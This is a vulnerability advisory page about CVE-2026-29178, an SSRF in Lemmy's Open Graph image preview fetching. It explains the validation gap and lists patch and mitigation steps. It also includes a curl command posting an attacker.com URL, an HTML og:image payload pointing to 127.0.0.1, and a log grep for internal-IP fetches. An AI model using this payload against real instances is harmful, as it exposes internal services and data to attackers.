Lemmy, SSRF via Open Graph Image Metadata, CVE-2026-29178 (Medium)

Listen to this Post

How the Mentioned CVE Works

CVE-2026-29178 describes a Server-Side Request Forgery (SSRF) vulnerability in Lemmy when handling link previews. The issue arises in the metadata fetching process for user-supplied post URLs. While the top-level page URL is checked against internal IP ranges, the extracted Open Graph (og:image) URL is not subject to the same restriction. An attacker can host a malicious page with an og:image tag pointing to an internal image endpoint (e.g., http://127.0.0.1:8081/internal.png`). When a low-privileged user posts this URL, Lemmy fetches the page, extracts the og:image URL, and then fetches that internal image through the local pict-rs service. This creates a two-stage chain where the first URL is constrained, but the second is not, bypassing security boundaries. The core vulnerable code path exists in functions like `generate_post_link_metadata()` andgenerate_pictrs_thumbnail(), which pass the unvalidated og:image URL toimage/download?url=…. An attacker can thus retrieve and cache internal images, exposing them via Lemmy's thumbnail serving path. This issue is exploitable by any authenticated low-privileged user on instances with the default `StoreLinkPreviews` image mode enabled.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Lemmy
Version: 0.19.15 (prior)
Vulnerability: SSRF via og:image
Severity: Medium (CVSS 6.5)
Date: 2026-03-03
<h2 style="color: blue;">Prediction: Patch available 2026-03-03</h2>
<h2 style="color: blue;">What Undercode Say</h2>
The vulnerability stems from inconsistent URL validation. To detect similar issues, monitor logs for outbound requests to internal IPs or unusual URL patterns. Use bash commands to test for SSRF:

Check for internal IP fetches in pict-rs logs
grep -E "fetching.(127\.0\.0\.1|192\.168\.|10\.)" /var/log/pictrs.log
Simulate a malicious og:image request (requires valid JWT)
curl -X POST https://lemmy.example/api/v3/post \
-H "Authorization: Bearer <JWT>" \
-H "Content-Type: application/json" \
-d '{"name":"SSRF Test","community_id":1,"url":"https://attacker.com/og.html"}'

Perform code analytics on `crates/api_common/src/request.rs` to ensure all extracted URLs undergo internal-address validation.
<h2 style="color: blue;">Exploit</h2>
An attacker can bypass SSRF protections by hosting an HTML file with an Open Graph meta tag pointing to an internal resource:

<html><head>
<meta property="og:image" content="http://127.0.0.1:8081/internal.png">
</head><body></body></html>

When posted to a Lemmy community, the server fetches this page, extracts the internal image URL, and fetches it, caching the internal image as a thumbnail. The attacker can then access the internal image via the generated thumbnail URL.
<h2 style="color: blue;">Protection from this CVE</h2>
- Immediately upgrade to Lemmy version 0.19.16 or later, which includes a patch that validates the og:image URL against internal IP ranges.
- If upgrading is not possible, disable the `StoreLinkPreviews` image mode in the configuration and block the vulnerable API route (
/api/v4/image/`) at the reverse proxy level.
– Implement strict input validation for all user-supplied URLs, including those extracted from metadata, to prevent SSRF.
– Regularly audit and review code changes related to URL fetching and metadata extraction.

Impact

This vulnerability enables an attacker to:

  • Retrieve internal image resources that are otherwise unreachable from the public internet.
  • Scan internal network services through the pict-rs fetch primitive.
  • Publish sensitive internal images as public thumbnails, potentially leaking confidential information.
  • Bypass SSRF protections designed to prevent access to localhost and internal hosts.
  • Exploit the issue with only low privileges, making it a significant risk for instances allowing user posts.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top